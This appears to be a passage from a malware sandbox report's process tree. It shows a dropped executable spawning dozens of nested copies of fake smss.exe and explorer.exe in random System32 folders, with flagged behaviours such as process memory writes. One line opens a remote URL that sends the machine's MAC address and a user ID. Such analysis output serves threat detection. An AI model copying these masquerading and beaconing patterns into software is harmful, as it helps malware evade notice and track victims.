    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://dd.zxcvbnmzxcvbnm.com/Chinago.ashx?Mac=F6:75:10:7A:81:82&UserId=118&Bate=1.05
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3104
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3104 CREDAT:17410 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:4176
- \??\c:\reajijjcrbeo.exe
  c:\reajijjcrbeo.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4900
- - C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
    C:\Windows\system32\fxechqhryrxh\smss.exe
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4504
  - - C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
      C:\Windows\system32\fxechqhryrxh\smss.exe
      4⤵
      Executes dropped EXE
      Enumerates connected drives
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1708
    - - C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1236
      - C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3432
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1676
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:5068
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1504
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        10⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4416
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        11⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2660
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2624
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3896
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3964
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3892
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:2200
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3380
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4860
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3524
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4796
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        21⤵
        Executes dropped EXE
        
        PID:1972
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        22⤵
        Drops file in System32 directory
        
        PID:1588
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        23⤵
        Enumerates connected drives
        
        PID:5232
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        24⤵
        
        PID:5824
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        25⤵
        
        PID:5928
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        26⤵
        
        PID:6156
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        27⤵
        Enumerates connected drives
        
        PID:6540
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        28⤵
        Drops file in System32 directory
        
        PID:6936
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        29⤵
        Enumerates connected drives
        
        PID:6672
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        30⤵
        
        PID:7296
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        31⤵
        
        PID:7812
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        32⤵
        
        PID:7956
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        33⤵
        
        PID:8568
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        34⤵
        
        PID:9024
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        35⤵
        
        PID:408
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        36⤵
        
        PID:10944
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        37⤵
        
        PID:11964
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        38⤵
        
        PID:13100
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        39⤵
        
        PID:5988
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        40⤵
        
        PID:18168
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        41⤵
        
        PID:25332
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        30⤵
        
        PID:25808
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        28⤵
        
        PID:16832
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        29⤵
        
        PID:19740
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        27⤵
        
        PID:6456
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        28⤵
        
        PID:17988
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        26⤵
        
        PID:15204
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        27⤵
        
        PID:16640
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        28⤵
        
        PID:23492
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        25⤵
        
        PID:14852
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        26⤵
        
        PID:16468
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        24⤵
        
        PID:14224
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        25⤵
        
        PID:17480
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        23⤵
        
        PID:12852
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        24⤵
        
        PID:5844
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        25⤵
        
        PID:17280
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        26⤵
        
        PID:23748
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        22⤵
        
        PID:11788
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        23⤵
        
        PID:12948
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        24⤵
        
        PID:14300
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        25⤵
        
        PID:17312
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        26⤵
        
        PID:24068
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        21⤵
        
        PID:10624
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        22⤵
        Enumerates connected drives
        
        PID:11388
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        23⤵
        
        PID:12456
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        24⤵
        Enumerates connected drives
        
        PID:14064
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        25⤵
        
        PID:16500
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        26⤵
        
        PID:19704
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        20⤵
        Enumerates connected drives
        
        PID:9488
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        21⤵
        
        PID:9432
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        22⤵
        
        PID:10364
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        23⤵
        
        PID:12020
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        24⤵
        
        PID:13472
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        25⤵
        
        PID:14416
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        26⤵
        
        PID:17516
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        27⤵
        
        PID:24628
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        19⤵
        
        PID:8196
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:9164
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        21⤵
        Drops file in System32 directory
        
        PID:9804
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        22⤵
        
        PID:10428
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        23⤵
        
        PID:3656
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        24⤵
        
        PID:12292
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        25⤵
        
        PID:13808
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        26⤵
        
        PID:14732
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        27⤵
        
        PID:16696
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        18⤵
        
        PID:7076
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:7636
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:1816
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        21⤵
        
        PID:8372
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        22⤵
        
        PID:8716
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        23⤵
        
        PID:9996
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        24⤵
        
        PID:10764
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        25⤵
        
        PID:11620
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        26⤵
        
        PID:12768
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        27⤵
        
        PID:5736
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        28⤵
        
        PID:17384
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        17⤵
        Enumerates connected drives
        Drops file in System32 directory
        
        PID:5968
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:6304
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:6608
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:7012
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        21⤵
        
        PID:7044
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        22⤵
        
        PID:7468
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        23⤵
        
        PID:8000
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        24⤵
        
        PID:8148
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        25⤵
        
        PID:8996
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        26⤵
        
        PID:9440
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        27⤵
        Enumerates connected drives
        
        PID:9360
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        28⤵
        
        PID:10336
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        29⤵
        
        PID:12000
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        30⤵
        
        PID:13440
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        31⤵
        
        PID:14400
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        32⤵
        
        PID:17488
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        21⤵
        
        PID:23996
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        20⤵
        
        PID:18392
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        21⤵
        
        PID:25444
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        19⤵
        
        PID:16272
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:18536
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        18⤵
        
        PID:15268
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:18072
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:24648
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        16⤵
        
        PID:1448
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:5344
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:5976
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        Drops file in System32 directory
        
        PID:6072
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:6212
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        21⤵
        
        PID:6592
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        22⤵
        
        PID:6996
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        23⤵
        
        PID:7028
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        24⤵
        
        PID:7452
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        25⤵
        
        PID:7900
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        26⤵
        
        PID:3292
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        27⤵
        
        PID:8960
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        28⤵
        Enumerates connected drives
        
        PID:9400
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        29⤵
        
        PID:9328
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        30⤵
        
        PID:11156
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        31⤵
        Enumerates connected drives
        
        PID:4856
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        32⤵
        
        PID:13396
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        33⤵
        
        PID:14376
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        34⤵
        
        PID:17376
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        23⤵
        
        PID:23796
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        22⤵
        
        PID:18088
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        23⤵
        
        PID:24720
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        21⤵
        
        PID:16240
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        22⤵
        
        PID:18516
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        20⤵
        
        PID:15252
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        21⤵
        
        PID:16188
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        22⤵
        
        PID:19068
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        23⤵
        
        PID:7224
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        19⤵
        
        PID:14952
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:6928
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        21⤵
        
        PID:19128
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        18⤵
        
        PID:14368
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:17240
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:23556
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        17⤵
        
        PID:13232
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:14360
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:18276
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        15⤵
        Enumerates connected drives
        
        PID:4404
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:4956
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:5352
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:5956
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:4900
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:6204
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        21⤵
        
        PID:6576
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        22⤵
        Drops file in System32 directory
        
        PID:6980
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        23⤵
        
        PID:3988
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        24⤵
        
        PID:7436
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        25⤵
        
        PID:7892
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        26⤵
        
        PID:4948
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        27⤵
        
        PID:8952
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        28⤵
        
        PID:9388
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        29⤵
        Enumerates connected drives
        
        PID:9336
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        30⤵
        
        PID:11148
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        31⤵
        
        PID:11936
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        32⤵
        
        PID:13416
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        33⤵
        
        PID:14384
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        34⤵
        
